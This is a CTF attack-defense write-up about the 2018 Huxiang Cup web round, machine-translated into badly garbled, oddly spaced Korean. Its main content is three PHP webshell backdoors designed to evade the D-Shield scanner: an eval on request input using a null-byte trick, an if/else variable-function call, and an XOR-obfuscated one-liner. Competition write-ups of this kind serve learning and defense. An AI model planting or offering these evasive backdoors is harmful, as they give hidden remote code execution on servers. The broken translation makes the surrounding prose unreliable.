후 샹 배 2018 WEB AD 중 하나 인 면 살 셸

9893 단어 CTF
설명 하 다.
올해 후 샹 컵 경기 제 도 는 매우 참신 하 다. 바로 운영 과 제목 은 아직 토로 해 야 한다. 상세 한 것 은 위의 큰 남자 들 의 평가 와 같다. P 멍 신 은 여기 서 웹 의 AD 상황 을 정리 할 수 밖 에 없다.
한 마디 로 장 내 를 다스리다
먼저 올 라 가면 루트 권한 의. shell. php 를 볼 수 있 습 니 다. 반복 적 으로 삭제 해 야 지 울 수 있 을 것 같 지만 이것 은 다시 반복 적 으로 기록 할 것 같 습 니 다.그래서 이 걸 들 고. 셸. php 가 계속 전체 에 요청 하면 돼 요. 몇 번 더 해 봐 요. 삭제 되 었 다가 다시 생 겼 나 봐 요.이것 은 아마도 주최측 이 스스로 웹 사 이 트 를 관리 하려 고 했 는데 지우 지 않 았 습 니까?그리고 flag 를 내 는 곳 이 카드 가 됩 니 다. 저 는 자동 으로 flag 를 내 는 스 크 립 트 를 써 서 상관 하지 않 았 습 니 다. 그 결과 제 가 제출 하지 않 은 적 이 많 고 점 수 를 적 게 받 았 습 니 다.물론 여기 서 80 개 팀 이 두 개의 C 단 으로 나 뉘 었 고 172.16.0.xxx 172.16.1.xxx 우 리 는 1.xxx 만 발견 했다.
백 도 어
시합 후에 p0 사내 에 게 가르침 을 청 했 는데 뒷문 이 하나 더 있 는 것 을 발 견 했 습 니 다. 그러나 우 리 는 직접 D 방 패 를 들 고 쓸 었 지만 쓸 지 못 했 습 니 다. 시합 후에 보 니 알 고 보 니:

$a = $_REQUEST['a'];
$b = null;//      ,         ,        
eval($b.$a.$b);//$b     ,    
?>

특이 하 네. D 방패 가 0 바이트 로 잘 렸 나 봐??,배 웠 어, 배 웠 어.예전 에 큰 놈 이 보 낸 if else 가 모니터링 을 돌 면 지금도 D 방패 보 2 급 위협 을 받 을 수 있 습 니 다.
=
$a = $_REQUEST[0];
if (true)
$b = $a;
else
$b = "";
if (true)
$c = $_REQUEST[1];
else
$c = "";
$c($b);    
?>

그러나 그런 것 이나 인 코딩 은 D 방패 에 의 해 밝 혀 지지 않 지만 특징 이 너무 뚜렷 해서 수 동 으로 검색 ^ 하면 됩 니 다. [웃음 울 음]
${(chr(63)^chr(96)).(chr(46)^chr(126)).(chr(47)^chr(96)).(chr(46)^chr(125)).(chr(47)^chr(123))}[(chr(43)^chr(64))](${(chr(36)^chr(123)).(chr(46)^chr(126)).(chr(47)^chr(96)).(chr(46)^chr(125)).(chr(47)^chr(123))}[(chr(44)^chr(64))]);

좋은 웹페이지 즐겨찾기